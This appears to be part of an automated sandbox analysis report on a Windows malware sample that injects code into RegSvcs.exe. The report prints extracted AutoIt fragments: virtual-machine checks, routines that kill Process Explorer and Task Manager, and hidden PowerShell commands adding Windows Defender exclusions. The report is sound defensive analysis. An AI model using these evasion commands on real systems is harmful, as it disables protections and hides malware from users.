          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_0103A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,15_2_0103A488
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_01037248 FindFirstFileW,FindClose,15_2_01037248
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_010372E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,15_2_010372E9
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_00294E14 VirtualQuery,GetSystemInfo,0_2_00294E14
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
          Source: cipkucw.ppt.exe, 0000000F.00000003.2021220494.000000000154F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
          Source: cipkucw.ppt.exe, 00000011.00000003.2089984383.0000000000B34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then
          Source: cipkucw.ppt.exe, 00000011.00000003.2165570776.0000000000B81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe
          Source: cipkucw.ppt.exe, 00000013.00000003.2240251372.000000000165D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rocessExists("VboxService.exe") Then
          Source: cipkucw.ppt.exe, 00000013.00000003.2240529759.000000000169A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe
          Source: cipkucw.ppt.exe, 00000013.00000003.2240251372.0000000001699000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240529759.000000000169A000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2241625199.00000000016AE000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2241646838.00000000016B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exea?
          Source: xdgrnj.pdf.0.drBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
          Source: cipkucw.ppt.exe, 00000013.00000003.2169637016.0000000001643000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thenp,
          Source: cipkucw.ppt, 00000006.00000003.1898912127.0000000000DF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exeh
          Source: cipkucw.ppt.exe, 0000000F.00000003.2021784883.00000000015A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exeZ{l
          Source: xdgrnj.pdf.0.drBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
          Source: RegSvcs.exe, 0000000C.00000002.4091230797.000000000188B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: cipkucw.ppt.exe, 0000000F.00000003.2021220494.000000000154F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then7ya
          Source: cipkucw.ppt.exe, 00000013.00000003.2240251372.000000000165D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
          Source: cipkucw.ppt.exe, 00000013.00000003.2219993576.0000000001854000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmware
          Source: cipkucw.ppt.exe, 00000011.00000003.2089984383.0000000000B34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
          Source: xdgrnj.pdf.0.drBinary or memory string: If ProcessExists("VboxService.exe") Then
          Source: cipkucw.ppt.exe, 00000011.00000003.2166743027.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2160554746.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2165570776.0000000000B81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exej
          Source: cipkucw.ppt.exe, 00000013.00000003.2169637016.0000000001643000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") ThenA,
          Source: cipkucw.ppt.exe, 00000013.00000003.2240529759.000000000169A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe3A765687
          Source: cipkucw.ppt, 00000006.00000003.1894814022.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1894903844.0000000000DDC000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1898812044.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1895062521.0000000000DE4000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1898912127.0000000000DF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exe
          Source: cipkucw.ppt.exe, 00000013.00000003.2240251372.000000000165D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
          Source: cipkucw.ppt.exe, 0000000F.00000003.1947893692.0000000001534000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021331796.0000000001546000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1947955595.0000000001544000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then4q
          Source: cipkucw.ppt.exe, 0000000F.00000003.2021220494.000000000154F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then15
          Source: cipkucw.ppt.exe, 0000000F.00000003.2021288890.000000000158F000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021764963.000000000159F000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021220494.000000000158B000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021436447.0000000001592000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exeAwf
          Source: cipkucw.ppt.exe, 00000013.00000003.2169637016.0000000001643000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") ThenF,
          Source: cipkucw.ppt.exe, 00000013.00000003.2241646838.00000000016B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exe
          Source: cipkucw.ppt, 00000006.00000003.1895445953.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1791493766.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2166453677.0000000000B34000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2089984383.0000000000B34000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2241821530.0000000001653000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2169741176.0000000001654000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2241782650.000000000164E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2169637016.0000000001643000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then
          Source: xdgrnj.pdf.6.dr, xdgrnj.pdf.0.drBinary or memory string: If ProcessExists("VBoxTray.exe") Then
          Source: cipkucw.ppt.exe, 0000000F.00000003.2021436447.0000000001592000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exe{uL
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeAPI call chain: ExitProcess graph end nodegraph_0-29963
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 12_2_01B71CE8 CheckRemoteDebuggerPresent,12_2_01B71CE8
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0076F3FF BlockInput,6_2_0076F3FF
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_00296878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00296878
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_006F5D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_006F5D78
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_0029ECAA mov eax, dword ptr fs:[00000030h]0_2_0029ECAA
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_00715078 mov eax, dword ptr fs:[00000030h]6_2_00715078
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_00FE5078 mov eax, dword ptr fs:[00000030h]15_2_00FE5078
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_002A2CE0 GetProcessHeap,0_2_002A2CE0
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_00296878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00296878
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_00296A0B SetUnhandledExceptionFilter,0_2_00296A0B
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_0029AAC4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0029AAC4
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_00295BBF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00295BBF
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_007229B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_007229B2
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_00710BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00710BCF
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_00710D65 SetUnhandledExceptionFilter,6_2_00710D65
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_00710FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00710FB1
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_00FF29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00FF29B2
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_00FE0BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00FE0BCF
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_00FE0D65 SetUnhandledExceptionFilter,15_2_00FE0D65
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_00FE0FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00FE0FB1
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Allocates memory in foreign processes
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptMemory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: FA0000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeMemory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 760000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeMemory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: F00000 protect: page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeMemory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: B40000 protect: page execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: FA0000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 760000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: F00000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: B40000 value starts with: 4D5A
          Writes to foreign memory regions
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: FA0000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: CD9000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 760000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 479000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: F00000
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: D76000
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: B40000
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 993000
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_00751A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,6_2_00751A91
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_006F3312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,6_2_006F3312
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct")memstr_2f8e52fc-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: for $objantivirusproduct in $colitemsmemstr_8dc2625d-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $usb = $objantivirusproduct.displaynamememstr_671e439b-2
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nextmemstr_790e50d5-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return $usbmemstr_32c16aaa-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc ;==>antivirusmemstr_43ea3abe-1
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func disabler()memstr_1dc9b1e2-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;if antivirus() = "windows defender" thenmemstr_92113db5-d
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;#requireadminmemstr_7e5fad5f-8
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " -command add-mppreference -exclusionpath " & @scriptdir, "", "", @sw_hide)memstr_1fc2e62f-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'", "", "", @sw_hide)memstr_27a0b55b-7
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbs'", "", "", @sw_hide)memstr_3f59f9dd-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbe'", "", "", @sw_hide)memstr_07ba1253-7
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbs'", "", "", @sw_hide)memstr_1b6c7abc-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbe'", "", "", @sw_hide)memstr_71aff43f-0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;endifmemstr_1a8795d1-7
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc ;==>disablermemstr_a9397dc8-d
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func antianalysis()memstr_445572f0-6
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if winexists("process explorer") thenmemstr_a421588f-5
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: winclose("process explorer")memstr_314e0d2d-4
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("procexp64.exe")memstr_6d75c701-d
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("procexp.exe")memstr_511be8fb-d
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if winexists("process hacker") thenmemstr_b5cdae1b-0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: winclose("process hacker")memstr_46bf1d0a-c
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("processhacker.exe")memstr_854e9b3c-3
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if processexists("taskmgr.exe") thenmemstr_cb11b85b-7
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("taskmgr.exe")memstr_d9b6be07-b
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1824178569.0000000006930000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: word.document.12@memstr_f8e37bb1-3
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1824178569.0000000006930000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ((((( hmemstr_56fea2f6-3
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1824178569.0000000006930000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: late=cmemstr_04b79ded-e
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1824178569.0000000006930000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: clate=cmemstr_039b136b-6
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1824178569.0000000006930000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e=c;lc_mmemstr_1d68af27-0
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1824178569.0000000006930000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ice\apphvsiphvsmemstr_9f9d9cb1-0
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1824178569.0000000006930000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ((((( hmemstr_3832ae43-2
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %8dhhhhhhmemstr_fb7e8f39-0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0000000000000000111111111111111122222222222222223333333333333333444444444444444455555555555555556666666666666666777777777777777788888888888888889999999999999999ttttttttttttttttccccccccnnnnnnnnoooooooorrrrrrrrttttttttvvvvvvvvwwwwwwwwzzzzzzzzaaaaaaaabbbbbbbbcccccccceeeeeeeeggggggggmmmmmmmmnnnnnnnnoooooooopppppppprrrrrrrrssssssssuuuuuuuuvvvvvvvvwwwwwwwwxxxxxxxxzzzzzzzzmemstr_2543e283-d
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bbbbddddffffggggiiiijjjjkkkkllllqqqqssssuuuuddddhhhhiiiijjjjllllqqqqyyyyaahhppxxyyffkkmemstr_09b4bb94-3
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0123456789tcnortvwzabcegmnoprsuvwxzmemstr_2f33c3c9-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdfgijklqsudhijlqyahpxyfkmemstr_8ce5dd0f-5
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: memstr_0dc9abc2-3
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ____rrrrmemstr_9d21e909-2
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qqttxxmmoomemstr_e2f18584-3
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !%&'()*+./0139:;<>?cgimnpswy[\]^abcdfjlnpqsuwmemstr_3bc5892a-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qtxmomemstr_835b0531-7
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !#######memstr_88c03080-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: memstr_11c3368f-1
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: memstr_6ad9bbda-4
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ##,,--<<aajjss__oomemstr_3c69df5c-a
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "$()*.1345789;=>?bcdeghkmnopuz\emns~memstr_34b3c400-9
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #,-<ajs_omemstr_3cdb39a1-c
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: """""""memstr_b2205639-6
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ########memstr_32f906b5-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: memstr_25429039-9
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: aaaaddddeeeeiiiilllloooossssuuuumemstr_7cd9d45f-1
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ""$$((..2233aabbccddeehhiillmmnnpprrssttuuvv__bbccffgghhkkmmnnpprrttwwxxyymemstr_849ba44c-1
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !#%&')*+,-/014568<=>?@fgjkoqwxyz[\]^`jvz{|memstr_a243e95e-b
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: adeilosumemstr_ee025d5f-0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "$(.23abcdehilmnprstuv_bcfghkmnprtwxymemstr_0aa0a2ff-a
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 79:;q}~memstr_d745ff4a-6
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !$%'''''memstr_a3c5baed-8
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !#####memstr_d75d5844-1
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: memstr_bfe65bf7-0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 77778888memstr_ac2d764c-0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ""##''++,,--//0011223344556699::;;<<==>>??@@ccddggnnppssuuvvwwxxzz\\]]__aabbccddeeffggiillmmnnooppqqrrssttuuvvwwxxzz{{||~~memstr_01077379-3
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !$%&()*.abefhijklmoqrty[^`hjky}memstr_e8039044-e
